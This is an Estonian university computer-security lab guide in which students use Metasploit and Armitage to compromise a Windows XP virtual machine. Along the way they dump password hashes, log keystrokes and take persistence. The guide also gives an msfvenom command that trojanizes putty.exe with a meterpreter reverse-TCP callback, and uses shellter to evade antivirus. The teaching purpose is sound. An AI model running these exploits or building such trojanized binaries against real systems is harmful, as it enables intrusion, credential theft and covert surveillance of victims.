Institute of Computer Science
  1. Courses
  2. 2023/24 spring
  3. Computer Security (LTAT.06.002)
ET
Log in

Computer Security 2023/24 spring

  • Pealeht
  • Loengud
  • Praktikumid
  • Referaat
  • Kirjandus
  • Lingid

Praktikum 12 - Turvaaukude ärakasutamine

Käesoleva praktikumijuhendi probleemile leidsime ajutise lahenduse kui teha täiendavalt KALI virtuaalmasinas käsud sudo apt update ja sudo apt upgrade. Kahjuks viimane neist võtab aega umbes 30 minutit, sest uuendab kogu virtuaalmasina tarkvara. Juhend on vastavates osades ka uuendatud, nii et eraldi neid käske pole vaja sisestada vaid võib juhendit järjest sooritada. Kui endiselt on probleeme kirjutage alo.peets@ut.ee

Käesolevas praktikumis vaatleme lähemalt, kuidas pahalane on võimeline ohvri arvuti uuendamata tarkvara turvanõrkusi ära kasutama. Selleks kasutame Metasploit framework nimelist populaarset ründetarkvara koos Armitage kasutajaliidesega ning ohvriks eelnevatest praktikumidest tuttavat Windows XP SP3 virtuaalmasinat. Kiirema keskkonna seadistamise eesmärgil kasutame Kali Linux virtuaalmasinat, mille VirtualBox versiooni saame alla laadida Kali allalaadimise veebilehelt.

Kali Linux ja metasploit seadistamine

Alustuseks kustutame teie arvutist eelnevad praeguseks mittevajalikud virtuaalmasinad ja laadime alla vajaliku virtuaalmasinatarkvara:

  • Kõvaketta ruumi kokkuhoiu huvides võite kustutada eelnevates praktikumides kasutusel olnud andmeturve virtuaalmasinad: Andmeturve Linux Mint kloon, Andmeturve Windows 10 ja Windows_XP_SP3. Praktikum 15 vajame Linux Mint virtuaalmasinat ID kaarti tarkvara katsetamiseks, seega seda veel ärge kustutage. Loomulikult eeldab kustutamine, et olete varasemad praktikumid edukalt sooritanud ja esitanud.
  • Kali kodulehelt https://www.kali.org/get-kali/#kali-virtual-machines valige -> Virtual Machines -> 64 bit - VirtualBox.
  • Soovitavalt kustutage eelmistest praktikumist olemasolev Andmeturve_XP_SP3.ova ja importige see uuesti. Praktikumis 9 rikub üks kahjurvara Windowsi toimimist nii, et käesolevas praktikumis tekiksid teil probleemid vastava Windows_XP_SP3 masinaga. Kui teil on vaja OVA uuesti alla laadida, saate seda teha siin lingil: https://owncloud.ut.ee/owncloud/index.php/s/CrtBMvRouATSgz8, kus allalaadimise parooliks sisestage aine kood LTAT.06.002.

Järgnevalt pakkige lahti kali-linux-2024.1-virtualbox-amd64.7z ja tehke topeltklõps (käivitage) fail kali-linux-2024.1-virtualbox-amd64.vbox (kasutaja: kali, parool: kali) ja Andmeturve_XP_SP3.ova virtuaalmasin. Enne virtuaalmasinate käivitamist on mõistlik igaks juhuks neile genereerida uued MAC aadressid: VirtualBox -> parem klahv soovitud virtuaalmasina nimel -> Settings -> Network -> Advanced -> MAC Address rea lõpus refresh nupp (Kui rida on hall, st ei luba genereerida siis veendu, et su virtuaalmasin on väljalülitatud olekus.)

Kali virtuaalmasinale on soovitatav võimalusel anda ka 4GB RAM (Base Memory) VirtualBoxi seadetest.

Käivitage Kali virtuaalmasin ja logige sinna sisse. Teil võiks töötada ka ekraani dünaamiline suurendamine ja teksti kopeerimine põhimasinast (Shared Clipboard).

Nüüd paigaldage ründamiseks vajalik tarkvara: 

sudo apt update
sudo apt upgrade
sudo apt install kali-tools-exploitation
sudo apt install metasploit-framework
sudo systemctl start postgresql
sudo msfdb init
sudo armitage

Armitage käivitamise ajal vajutage Connect ja Yes (RPC Server) küsimustele. Nüüd peaks teil olema avatud Armitage kasutajaliides. Sulgege Armitage.

Edukaks võrguründeks on meil vaja, et meie ohver ja ründaja saaksid omavahel suhelda, selleks seadistame mõlemad virtuaalmasinad Kali Linux ja Windows XP kasutama bridge mode võrguühendust. Veendu, et mõlemad virtuaalmasinad on saanud endale uued IP-aadressid teie kodus või klassis kasutatavast alamvõrgus (enamasti 192.168.1.124 vms, 10.0.2.15 on NAT aadress ja ei ole sobiv. Tehke virtuaalmasinale taaskäivitus, pärast mida on loodetavasti virtuaalmasinal siiski õige IP-aadress.) Linuxis näeb IP-aadressi ip a käsuga ja Windowsis cmd käsureal ipconfig sisestades.

Windows XP masinas tuleb lubada Start -> Control Panel -> vasakul Switch to Classic View -> Windows Firewall -> General -> Off (not recommended).

Windows XP -> Start -> Control Panel -> Network Connections -> parem hiireklahv Local Area Connection -> Properties -> luba File and Printer Sharing for Microsoft Networks -> OK.

Windows XP -> Start -> Control Panel -> System -> Remote -> luba Allow users to connect remotely to this computer -> OK.

Veendumaks, et meie Kali Linux saab ühendust Windows XP masinaga, sisestage nmap -sV <XP-masina IP-aadress>. Väljundis peab kindlasti olema nähtav port 445/tcp open microsoft-ds. Kui ei ole, kontrollige eelnevaid tegevusi kuni on nähtav või võtke ühendust aine õppejõuga. Hetkel parim ja kiireim lahendus kui Windows XP virtuaalmasin käsureal netstat -an käsu peale ka ei näita port 445 aktiivsena on Windows XP virtuaalmasin uuesti importida VirtualBoxi. Eelnev mure tuleneb asjaolust, et praktikumis 9 tegi mõni pahalastest süsteemi muudatusi, mis mõjutab Windows XP normaalset toimimist taustal.

Armitage

Nüüd on meil ohvriks olev Windows XP virtuaalmasin ja Kali Linux seadistatud omavahel suhtlema ning ohvri arvutis on vähendatud turvalisust, et ründed võimalikud oleksid.

Käivitame uuesti armitage tarkvara järgnevate käskudega: 

sudo systemctl start postgresql
sudo armitage

Kui teil eelmise käsu peale armitage ei käivitu siis on soovitatav kogu KALI virtuaalmasinale taaskäivitus teha ja uuesti proovida. Kali 2024 64 bitises versioonis kahjuks armitage ei sulgu korralikult ja mingid teenused jäävad taustale ootele, mis takistavad programmi teist korda käivitamist.

Alustame rünnakut võrgus skännimisega (ohvri leidmisega). Armitage -> menüüst Hosts -> Nmap Scan -> Quick Scan (OS detect) -> Sisestage enda alamvõrgu aadress näiteks 192.168.1.0/24 -> OK.

Oodake kuni 1 minut pärast mida peaks ohvri virtuaalmasin (ja mõned muud veel) nähtavale ilmuma.

Armitage tarkvara on tasuta ja seega esineb seal mõningaid stabiilsuse probleeme ehk vahepeal tuleb mitu korda proovida, et käsud või tegevused normaalselt toimiks. Õppejõud otsivad lahendust ja annavad teada kui on rohkem infot. Sellest tulenevalt, kui kõik tegevused ei tööta, võib esitada ka pildid sellest, et proovisite, aga Armitage tarkvara ei õnnestunud tegevust toimima saada.

Nüüd uurime ohvrit täpsemalt, tehes talle põhjaliku avatud portide otsimise:

Armitage -> rippmenüü Hosts -> Nmap Scan -> Intense Scan, no ping -> Sisestage Windows XP (ohvri) IP-aadress näiteks 192.168.1.175 -> OK -> jälgige all väljundit ja uurige mida tuvastati ohvri kohta. Kuigi meie näites on ka ohver meie kontrolli all, siis enamik päriselulistes rünnakutes ei ole ohvrist kuigi palju teada ja info kogumine ning kasutatava tarkvara tuvastamine on eelduseks hilisemaks edukaks ründeks.

Nüüd on meil teada ohvri arvuti IP-aadress, avatud TCP pordid 135, 139, 445 ja 3389 ning operatsioonisüsteem Windows XP SP3. Järgnevalt peame Interneti avarustest leidma sobiva exploit ehk haavatavuse ja lootma, et sellele on ka näidiskood kuidas rünnata. Näiteks Exploit Database nimeline leht võimaldab suhteliselt mugavalt filtreerida vastuseid meid huvitavate portide põhjal: https://www.exploit-db.com/?type=remote&platform=windows&port=445

Nüüd peaksime hakkama vastuseid detailselt läbi analüüsima, kuid lihtsuse huvides annavad siinkohal õppejõud teile vihje, et MS08-067 ja MS17_010 on haavatavused, mis meile huvi pakuvad.

Järgnevalt proovimegi armitage tarkvaras vastavaid ründeid ära kasutada. Selleks kirjutage vasakul olevasse otsingu aknasse ms08 ja/või leidke nimekirjast exploit/windows/smb/ms08_067_netapi. Käivitamiseks võite lohistada vastava exploit sobiva arvuti peale armitage tarkvaras (või teha topeltklikk ning sisestada käsitsi õige RHOST IP-aadress). Nüüd vajutage Launch nuppu ja jälgige väljundit alumises mustas kastis. Eduka ründe korral muutub ohvri arvuti punaseks ning välgujoontega ümbritsetuks.

Palju õnne, olete edukalt ohvri arvutis. Järgnevalt vaatame, kuidas endale küsida täiendavaid õigusi (enamasti saate esialgu ligi tavaõigustega) ning mida muud huvitavat me ohvri arvutis teha saame. Nüüd minge ohvri arvuti peale ja tehke seal parem hiireklahv -> Meterpreter -> Access -> Escalate Priviledges, mille tulemusena avaneb vasakul nn local ehk kohalikud ründed õiguste suurendamiseks. Kuna meil on juba süsteemi õigused siis hetkel me õiguste omandamist täpsemalt ei vaata.

Järgnevalt vaatame, kuidas ligi pääseda kasutaja paroolidele. Selleks tehke parem hiireklahv ohvri arvutil -> Meterpreter -> Access -> Dump Hashes -> lsass method -> jälgi väljundit all aknas.

Uurige eelmise käsu väljundit ja eelnevate aines omandatud teadmiste (või interneti abiga) leidke väljundist, milline osa on kasutaja parooli räsi. Nüüd peame muutma parooli räsid inimloetavale kujule. Selleks tulevad meile appi veebilehed, mis võimaldavad levinud räsisid kontrollida nende andmebaasis olevate vastu ning kui ei leidu, siis väikese "tasu" eest need meile lahti murda. Meie parool on suhteliselt lihtne. Leidke https://crackstation.net/ lehte või mõnda sarnast kasutades, mis on Andmeturve Windows XP virtuaalmasina kasutaja Administrator parool?

Ülesanne 1: Mis on Andmeturve Windows XP Administrator kasutaja parool? (mitte esitada parooli räsi ja mitte esitada LM puhul osaliselt sobivat Partial match vastust)

Järgnevalt vaatame, kuidas ligi pääseda kasutaja sisestatud klahvivajutustele (näiteks veebilehitsejas sisestatud paroolid). Selleks tehke parem hiireklahv ohvri arvutil -> Meterpreter -> Explore -> Log Keystrokes -> jälgi väljundit all aknas (jätke aken avatuks).

Nüüd minge Windows XP arvutisse ja külastage veebilehitsejaga aadressi https://andmeturve-lab.appspot.com/ ja sisestage väljadele oma Eesnimi, Perenimi ja sõnum. Vaata näidist allpool.

Ülesanne 2: Esitage Kali Linux Armitage tarkvarast täisekraanivaade, kus on selgelt näha teie ohver (punane), Log Keystrokes edukas rünne ja teie Eesnimi ning Perenimi.

Tutvuge ka teiste valikutega, mida ohvri arvutiga teha saate. Mõned, mida õppejõud soovitavad kindlasti proovida:

  • Meterpreter -> Access -> Persist (järgmine kord paneb ennast ise tööle), Pass Session (pahalase seansi üle viimine teise protsessi peale, näiteks veebilehitsejast explorer.exe vms).
  • Meterpreter -> Explore -> Browse Files (võimaldab mugavalt faile vaadata), Show Processes (tutvu käimasolevate protsessidega (näiteks kui otsid võimalusi õiguste eskaleerimiseks), Screenshot (ekraanipilt), Webcam Shot (nö kahjunõude rünnak, ma tean küll mis sa seal arvuti ees teed)
  • Meterpreter -> Pivoting -> Setup (Võimaldab kasutada ohvrit nö lülina ahelas, et järgmiste ohvriteni pääseda. Kasutatakse palju veebiserveritest edasi sisevõrku pääsemiseks). Võimaldab teha nmap ja muid tegevusi pivot arvutist lähtuvalt.

Katkestame nüüd aktiivse meterpreter seansi ja katsetame veel mõnda teist rünnet.

  • parem hiireklahv ohvri arvutil -> Meterpreter -> Kill (katkestab aktiivse seansi ohvriga)

Katsetage nüüd ohvri peal uuesti rünnakut (tehke iseseisvalt, peaks õnnestuma rünnak): 

ms17_010_psexec

Katkestame nüüd aktiivse meterpreter seansi ja katsetame mõnda teist rünnet veel.

  • parem hiireklahv ohvri arvutil -> Meterpreter -> Kill (katkestab aktiivse seansi ohvriga)

Testime, kas ohver on haavatav ja katsetame uuesti rünnakut: 

auxiliary/scanner/rdp/cve_2019_0708_bluekeep
exploit/windows/rdp/cve_2019_0708_bluekeep_rce (Targets: 2 => Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VirtualBox 6)

Ei õnnestu ohvrit üle võtta. Nagu nimigi ütleb, sobib pigem Windows 7 ründamiseks, kuigi internetis on leitav modifikatsioon, mis väidetavalt suudab edukalt ka Windows XP rünnata, mis tegelikult on vastavale ründele ka haavatav. Ei hakka siinkohal katsetama.

Mitte kõik ründed ei võta ohvrit üle - näiteks järgmine rünnak võimaldab arvutile DOS (Denial Of Service), meie puhul restart teha: 

auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Peaks sundima Windows XP arvuti restarti

Sulgege Armitage tarkvara!

Ründame aegunud tarkvara

Kui kasutaja on turvateadlik ja omab uuendatud tarkvara, koos tulemüüri ja antiviirusega, on päriselus suhteliselt raske leida arvuteid, mis oleksid haavatavad. Leidub, aga valdav enamik on siiski täna juba turvatud. Seega vaatame olukorda kus eesmärgiks on rünnata kasutajat külastama mingit veebilehte, mille aadress edastatakse e-mailiga (või mõnda muudmoodi). Samuti on Armitage funktsionaalsus, töökindlus ja kiirus piiratud, seega proovime järgmise harjutuse sooritada metasploit framework peamises ja levinumas käsurea liideses. (Need üksikud tudengid, kes tahavad paremini aru saada, miks, mida mingi järgnev käsk teeb, on soovitatav lugeda pikemat detailset inglisekeelset juhendit https://nooblinux.com/metasploit-tutorial/ NB! Erineb meie lahendusest, kasutada ainult mõistmiseks).

  1. Et järgnev rünnak oleks efektsem ühendame Windows XP arvuti tagasi NAT ühendust kasutama.
    • Pärast muudatust peaks Windows XP IP aadress olema 10.0.2.15.
  2. Avage Linuxi käsurida ja sisestage käsk sudo msfconsole.
    • Käsurea alguses peaksite nüüd nägema kirja msf6> (edaspidi metasploit käsurida või msf).
  3. Metasploit käsureale kirjutage käsud help, show -h ja show exploits.
    • Viimase käsu väljund on pikk nimekiri kõikidest implementeeritud rünnakutest, mis msf vaikimisi kaasas on.
  4. Proovime leida endale sobivat turvanõrkust käsuga search "internet explorer" -s date.
    • Avanes nimekiri nõrkustest, kust õige valimiseks tuleb enamasti vaadata viimaste seast. Kuna meie kasutame aga näiteks vanemat Windows XP arvutit, mis sisaldab vanemat tarkvara, vihjame, et huvipakkuv turvanõrkus kannab nime exploit/windows/browser/ms10_002_aurora.
  5. Valime turvanõrkuse käsuga use 41 (lühike, kuid eeldab et teil sama järjestus) või täispika käsuga use exploit/windows/browser/ms10_002_aurora.
    • Saate teate: No payload configured, defaulting to windows/meterpreter/reverse_tcp.
    • Teie käsurida peaks nüüd välja nägema msf6 exploit(windows/browser/ms10_002_aurora) >, kuhu sisestage käsk info. -> Sirvige väljundit.
  6. Sisestage käsk options, set LPORT 4445 ja options.
    • set käsuga saate seadistada vajalikke parameetreid, näiteks RHOST (Remote hosts, mis tähistab ohvri IP või payload.
  7. Käivitage rünnak käsuga run.
    • Väljundis peaks tulema rida Server started.
  8. Nüüd otsige msf väljundis rida Using URL: http://192.168.1.242:8080/TRN3iK2JR5w (teil on arvatavasti veidi erinev) ning kopeerige see mälusse.
  9. Avage Windows XP veebilehitseja Internet Explorer (mitte: Firefox, mis pole haavatav) ning külastage eelnevalt viidatud aadressi Internet Explorer veebilehitsega. Nüüd peaks Internet Explorer hanguma ja msf rünnaku aknas tulema kiri Meterpreter session 1 opened ... (eelnevas väljundis sessiooni number võib olla teil erinev). Kui esimesel korral ei õnnestu, sundige Internet Explorer sulguma ja avage aadress uuesti.
  10. Vajutage msf käsureal ENTER.
    • Peaks avanema uus rida kuhu saate käske sisestada.
  11. Sisestage msf käsureale sessions ja sessions -x.
  12. Sisestame käsu sessions -i 1.
    • Käsurida peaks algama tekstiga meterpreter >, sisestage käsk help.
  13. Proovige järgmisi käske: ls, pwd, sysinfo, getuid, getpid, ps, edit perenimi.txt.
    • Vajutage vim editoris i ja kirjutage esimesele reale enda nimi ning väljumiseks ESC klahvi ning :wq.
    • Veenduge Windows XP masinas, et Desktopile tekkis teienimeline fail.
  14. Proovime väljastada kõigi kasutajate paroolide räsid: hashdump.
  15. Küsime endale täiendavaid õigusi getuid ja getsystem käsuga.
    • Kontrolli getuid käsuga, et nüüd on teil õigusteks NT AUTHORITY\SYSTEM.
  16. Aktiivsest meterpreter sessioonist saate väljuda käsuga bg ehk background ja tagasi sessions -i 1.
  17. uictl disable all. Nüüd proovige Windows XP arvutis hiirega aknaid liigutada või klaviatuurivajutusi sisestada.
    • Ei tohiks töötada, sarnaselt lülitavad pahalased korraks teie hiire välja tekitades tunde et arvuti jooksis kokku ning samal ajal teevad nemad mingi pahateo ning annavad hetkepärast ekraani, hiire, klaviatuuri jne tagasi käsuga uictl enable all.
  18. Sulgege Windows XP arvutis Internet Explorer (punasest X nupust nurgas -> End Now -> Don't Send).
    • Nüüd peaks teie meterpreter session sulguma (closed) selle peale.
    • Vajutage ENTER ja teie terminal peaks olema msf6 exploit(windows/browser/ms10_002_aurora) >.
  19. Käivitame ründe uuesti, et näha rünnaku aadressi: run.
    • Saame veateate, et Handler failed to bind to 192.168.1.242:4445.
    • Aktiivseid töid näeme käsuga jobs ning käsuga jobs -k 2 on võimalik neid sulgeda. Loomulikul võib teil käimasoleva töö number olla erinev.
  20. Sulgege eelmine rünne jobs käsuga ja käivitage rünne uuesti run.
  21. Avage uuesti Windows XP veebilehitseja Internet Explorer ning külastage eelnevalt viidatud aadressi Internet Explorer veebilehitsega. Nüüd peaks Internet Explorer endiselt hanguma.
  22. sessions, sessions -i 2, getpid, ps ja käsk migrate 648 kolib teie protsessi ümber teisele protsessile. (Teie protsessi number võib olla teine, kuid võiks valida services.exe protsessile vastava PID.
  23. Vaatame visuaalselt, mis teises arvutis toimub käsuga screenshare, lõpetamiseks CTRL+C ja metasploidis exit, exit.

Ülesanne 3: Esitage Kali Linux metasploit tarkvara poolt avatud firefox veebilehitseja screenshare, kus on näha Windows XP arvutis avatud Command Promptis ipconfig käsu väljund ja seal NAT IP aadress 10.0.2.15. Samuti peab avatud olema teie perenimi.txt fail ja seal sees teie nimi.

Näidislahendus.

Varjatud funktsionaalsusega faili loomine

Eelnevalt vaatasime, kuidas ära kasutada aegunud tarkvaras esinevaid levinud turvaauke. Järgnevalt läheme aga sammu kaugemale ja vaatame, kuidas luua enda pahavara, mis oleks väikeste modifikatsioonidega võimeline nakatama ka kaasaegset uuendatud Windows 10 arvutit.

Keskkond:

  • Ründaja Kali Linux 32-bit, Network bridge mode.
  • Ohver Windows XP SP3, Network NAT mode.

Pahalase loomine

msfvenom on tarkvara, mis võimaldab luua peidetud pahalast ohvri nakatumiseks. Täpsemalt peidab ta olemasoleva või uue tarkvara sisse funktsionaalsuse, mis kasutab nn helista koju funktsionaalsust, kus pärast käivitamist ohvri (kasutaja) poolt võtab ta ühendust metasploit serveriga. Rohkem infot https://www.offensive-security.com/metasploit-unleashed/msfvenom/. Enne msfvenom kasutamist peaksime alla laadima tarkvara, mida kasutada viiruse sisendiks (nö programmi nähtav osa).

Selleks mine Kali Linuxiga Internetti ja laadi alla 32 bit putty.exe programm. (Otselink https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe)

Järgnev käsk võtab sisendiks putty.exe ning liidab sellega meterpreter reverse_tcp ühenduse loomiseks vajalikud bitid ja baidid. Kindlasti peate järgmises käsus ära muutma LHOST=192.168.1.242 parameetri, mis vastaks teie Kali Linux IP-aadressile. Samuti peab LPORT=20123 parameetris pordi kolm viimast numbrit vastama teie matriklinumbri kolmele viimasele numbrile. (See on vajalik, et meil oleks võimalik tuvastada hiljem, et lahenduse pildid kuuluvad teile.) NB! Järgnev käsk sisestage kaustas, kuhu te putty.exe alla laadisite (vaikimisi Downloads). 

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.1.242 LPORT=20123 -x putty.exe -k -o ~/putty-fixed.exe

Nüüd on meil olemas putty tarkvarast modifitseeritud versioon, mis iga kord kui seda käima panna üritab taustal ühendust võtta käsu sisendiks olnud IP-aadressi ja pordiga. msfvenom loodud modifitseeringud on aga juba laialt levinud ja enamik viirusetõrje tarkvarasid on võimelised seda kiiresti tuvastama. Järgnevalt vaatame shellter nimelist tarkvara, mis üritab loodavat programmikoodi hägustada ja sellega üritavad viirusetõrjetarkvara ära petta. Tõsi, mitte küll kuigi edukalt enam aastal 2024, kuid sarnased tasulised või vähemlevinud tarkvarad siiski seda tihti suudavad. Niipea, kui koodi hägustav tarkvara saab populaarseks või hakkab rohkem levima, suudavad ka viirusetõrje tarkvarad selle tuvastamise ära õppida. Lisaks kasutavad mitmed viirusetõrjed täna koodi käivitamist isoleeritud docker või sarnastes keskkondades, kus nad saavad pahalase käitumist paremini uurida kui ainult programmikoodi analüüsides oleks võimalik. Vastavat funktsionaalsust vaatame veidi hiljem https://virustotal.com lehelt. 

sudo dpkg --add-architecture i386
sudo apt update 
sudo apt install wine32
sudo apt install shellter
sudo shellter

Sisesta vastused nagu näidatud järgneval pildil. NB! Pordinumbri kolm viimast kohta peavad vastama teie matriklinumbri kolmele viimasele kohale. Näiteks 20123 juures 123 oleksid õppejõu matriklinumbri kolm viimast kohta.

Testime pahalast

Peame nüüd kuidagi pahalase toimetama ohvri arvutisse. Seda saaks teha e-mailiga või muudmoodi veenda kasutajat avama meie loodud faili. Käesolevas näites lõime *.exe faili, kuid sarnaseid näiteid on ka PDF, DOC ja teiste levinud failitüüpide korral (igaüks ründab nõrkusi vastavas tarkvaras). Toimetame pahalase Windows XP arvutisse hetkel üle ssh ühenduse. Selleks lubame ssh ühendused Kali Linuxis: 

sudo service ssh start
service ssh status

Windows XP masinas läheme Internetti ja laadime alla Bitvise ssh client tarkvara https://www.bitvise.com/ssh-client-download ning paigaldame selle.

Nüüd loome SSH-ühenduse Kali Linux'ga ja kopeerime Downloads kaustast modifitseeritud putty.exe ja putty-fixed.exe failid Windows XP Desktopile.

Nüüd peame seadistama Kali Linux pahalast kuulama. Käivitame uuesti armitage tarkvara järgnevate käskudega: 

sudo systemctl start postgresql
sudo armitage

Rippmenüüst Armitage -> Listeners -> Reverse (wait for) -> Create listener, Port: 20XXX, kus XXX on sinu matrikli kolm viimast numbrit ehk LPORT, mille seadistasid shellter käivitades. Type: meterpreter -> Start Listener.

Nüüd võime Windows XP Desktopilt käivitada putty.exe. Avaneb tavaline putty programm ning kasutajale ei viita miskit, et taustal käib pahalane. Kui aga vaatame armitage tarkvarasse, siis peaksime avastama, et vahepeal on meiega ühendust võtnud ohvri arvuti. Vastav muudatus võiks Kali Armitages kajastuda umbes 1 minuti jooksul.

Järgnevalt, kui saite kirja Meterpreter session 5 opened ..., siis meil on olemas aktiivne ühendus ohvriga, aga enamasti Armitage ei kuva seda ühendust visuaalselt, sest tegu ei ole otsese ühendusega vaid kaudse (üle teise masina). Nägemaks ühenduse infot sisestage käsk sessions või sessions -x. Nüüd saame ka olemasolevaid sessioone kasutada sessions -C getuid, sessions -C getsystem ja sessions -i 5 -C "run post/windows/gather/hashdump", kus 5 on teie sessiooni number. Aeg-ajalt on kasulik kolida sessioon üle ka teise protsessi peale use post/windows/manage/migrate, set session 1 ja run.

  • Ülesanne 4: Esita ekraanivaade armitage tarkvarast kus on näha nakatunud ohver ja meterpreter seansi info (LPORT parameetri väärtus). Näidislahendus:

Katkestage ühendus ja proovige, ka putty-fixed.exe nimelist pahavara. Peaks töötama samuti edukalt, kuna meie Windows XP ei oma aktiivset viirusetõrjet (samas õppejõu arvutis katkes ühendus 10s jooksul).

Uurime nüüd lähemalt, mida arvavad erinevad viirusetõrje tarkvarad meie loodud pahavarast. Selleks laadige tarkvara üles aadressile https://virustotal.com (teie modifitseeritud putty.exe versioon) ja oodake paar minutit, millal veebileht lõpetab faili analüüsi. PS! VirusTotal lehele võib olla vaja umbes 1 minuti möödudes teha värskendus (refresh), et ta uuendaks kuvatavaid andmeid. Selle analüüsiga on osadel tudengitel läinud ka umbes 15 minutit või VirusTotal suure koormuse hetkedel pole üldse analüüsi teostatud. Sellisel juhul võiks mõne aja pärast uuesti proovida enda loodud pahalasega faili analüüsiks üles laadida. Tutvuge tulemustega.

  • Ülesanne 5: Esitage ekraanivaade virustotal.com veebilehel BEHAVIOR vahelehest, kus on näha teie pahalase Network Communication juures sinu matriklinumbri kolmele viimasele numbrile vastav pordinumber. Seda analüüsib VirusTotal Jujubox sandbox.

Esitada Praktikum 12:

Praktikumi ülesande lahendamine annab neli punkti ja esitamiseks on umbes nädalat alates praktikumi toimumisajast.

  • Ülesanne 1: Mis on Andmeturve Windows XP Administrator kasutaja parool? (mitte esitada parooli räsi ja mitte esitada LM puhul osaliselt sobivat Partial match vastust) - 0.5p
  • Ülesanne 2: Esitage Kali Linux Armitage tarkvarast täisekraanivaade, kus on selgelt näha teie ohver (punane), Log Keystrokes edukas rünne ja teie Eesnimi ning Perenimi . - 1p
  • Ülesanne 3: Esitage Kali Linux metasploit tarkvara poolt avatud firefox veebilehitseja screenshare, kus on näha Windows XP arvutis avatud Command Promptis ipconfig käsu väljund ja seal NAT IP aadress 10.0.2.15. Samuti peab avatud olema teie perenimi.txt fail ja seal sees teie nimi. - 1p
  • Ülesanne 4: Esita ekraanivaade armitage tarkvarast kus on näha nakatunud ohver ja meterpreter seansi info (LPORT parameetri väärtus, mis vastab teie matriklinumbri viimastele kohtadele). - 1p
  • Ülesanne 5: Esitage ekraanivaade virustotal.com veebilehel BEHAVIOR vahelest, kus on näha teie pahalase Network Communication juures sinu matriklinumbri kolmele viimasele numbrile vastav pordinumber. - 0.5p

Armitage näidisvideod YouTubest.

  • https://www.youtube.com/results?search_query=armitage+xp+hacking
  • https://www.youtube.com/results?search_query=armitage+client+side+attack
  • Institute of Computer Science
  • Faculty of Science and Technology
  • University of Tartu
In case of technical problems or questions write to:

Contact the course organizers with the organizational and course content questions.
The proprietary copyrights of educational materials belong to the University of Tartu. The use of educational materials is permitted for the purposes and under the conditions provided for in the copyright law for the free use of a work. When using educational materials, the user is obligated to give credit to the author of the educational materials.
The use of educational materials for other purposes is allowed only with the prior written consent of the University of Tartu.
Terms of use for the Courses environment